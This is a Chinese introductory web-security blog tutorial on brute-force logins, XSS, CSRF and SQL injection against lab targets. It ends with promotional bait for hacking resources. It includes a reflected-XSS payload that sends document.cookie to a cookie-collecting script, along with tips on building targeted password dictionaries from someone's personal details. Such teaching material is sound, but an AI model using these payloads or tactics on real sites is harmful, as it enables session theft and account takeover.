常见的Web漏洞分析(非常详细)web安全入门到精通,收藏这篇就够了

暴力破解攻击

概述

不断地去试用户名和密码,直到试出来。

字典

1.常见的弱口令;

2.互联网上被脱裤后的账号密码(撞库),人们为了方便记忆很多网站使用相同的账号密码;

3.指定字符利用工具生成专属字典,已知某妹子的姓名手机号爱好等生产专属子字典。

产生条件

是否要求用户设置复杂密码;

是否每次认证使用安全的验证码;

是否对尝试登录的行为进行判断限制(例如五次输错暂停登录30分钟);

是否在必要的情况下采用了双因素认证(例如不光验证账号密码,还验证登录设备)。

测试流程

1.确认登录接口的脆弱性;

2.对字典进行优化;

3.工具自动化操作。

技巧:
1.试注册确认账号密码的要求(例如长度6位以上不允许出现数字);

2.管理员后台密码admin/administrator/root几率高。

常见场景

1.前端验证验证码

2.后台验证验证码

  • 验证码使用后没有被丢弃

  • 后台没有验证

  • 后台验证码参数为空,始终验证正确

3.token防验证码

后台生成token,会直接写在前端,编写脚本获取token,一起提交。

XSS(跨站脚本漏洞)

产生原理

攻击者在存在XXS漏洞的网站写入脚本,用户访问XXS页面返回带有恶意JS的页面,触发脚本,执行脚本发送窃取数据到攻击者指定的端口,攻击者伪造用户登录。

主要原因:

对输入和输出的控制不够严格,导致精心构造的脚本在输入后,在输到前端时被浏览器当作有效代码执行。

测试流程

1.输入特殊字符 '"<>?&

tips:输入长度限制,改前端代码

2.成功后输入payload

常见类型

1.存储型

特点:存在数据库,永久存储
易发情况:留言板,注册

2.反射型

特点:一次性
易发情况:查询页面
get 带有XSS的URL伪装后发送给目标。

<script>document.location='http://127.0.0.1:8080/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>'</script>``http://127.0.0.1:8080/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F127.0.0.1%3A8080%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E%27%3C%2Fscript%3E&submit=submit

(左右滑动查看完整代码)

post 制作另一个网页向C2发送数据。

3.DOM型

特点:不与后台服务器产生数据交互,DOM操作前端代码输出产生,属于反射型构造前端闭合。

防范措施

输入做过滤,输出做转义。

CSRF(跨站请求伪造)

概述

攻击者伪造一个请求,欺骗用户点击,用户一旦点击,在自己的登录态下发送请求,攻击完成,故CSRF也称“one click”攻击。

攻击完成满足的条件:
1.网站没有对个人信息修改进行防CSRF处理,导致请求易被伪造;
2.lucy登录了后台的情况下,点击了攻击者的链接,lucy不在登录态,或者不点链接均不会成功。

与XSS的区别:
CSRF借用户权限完成攻击,XSS直接盗取用户的权限。

测试流程

抓包观察是否加验证码/token。

get/post 漏洞演示

get:明文传参
post:借助另一台服务器上的网页发送post请求

Anti CSRF token

token随机数防御CSRF攻击。

防范措施

请求容易被伪造,加token验证。

SQL注入

闭合测试,构造合法SQL,欺骗后台执行。

SQL Inject漏洞原理概述

没有对用户输入的内容进行限制。

如何判断注入点类型及常见注入类型讲解:

  • 数字型

  • 字符型

  • 搜索型

注入方式get&post的区别

)

手工测试

SQL Inject漏洞手T测试:基于union联合查询的信息获取( select );

SQL Inject漏洞手工测试:基于报错的信息获取(select/delete/update/insert);

SQL Inject漏洞手工测试:操作系统权限获取。

盲注

对错误的信息屏蔽,或者使用标准方式输出:
1.没有报错信息

2.不管输入正确还是错误,都只显示两种情况

3.正确输入下,输入and 1=1/and 1=2发现可以判:

  • SQL注入漏洞-盲注( boolian base )原理及测试

  • SQL注入漏洞-盲注( time base )原理及测试

    题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
侵权,请联系删除。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值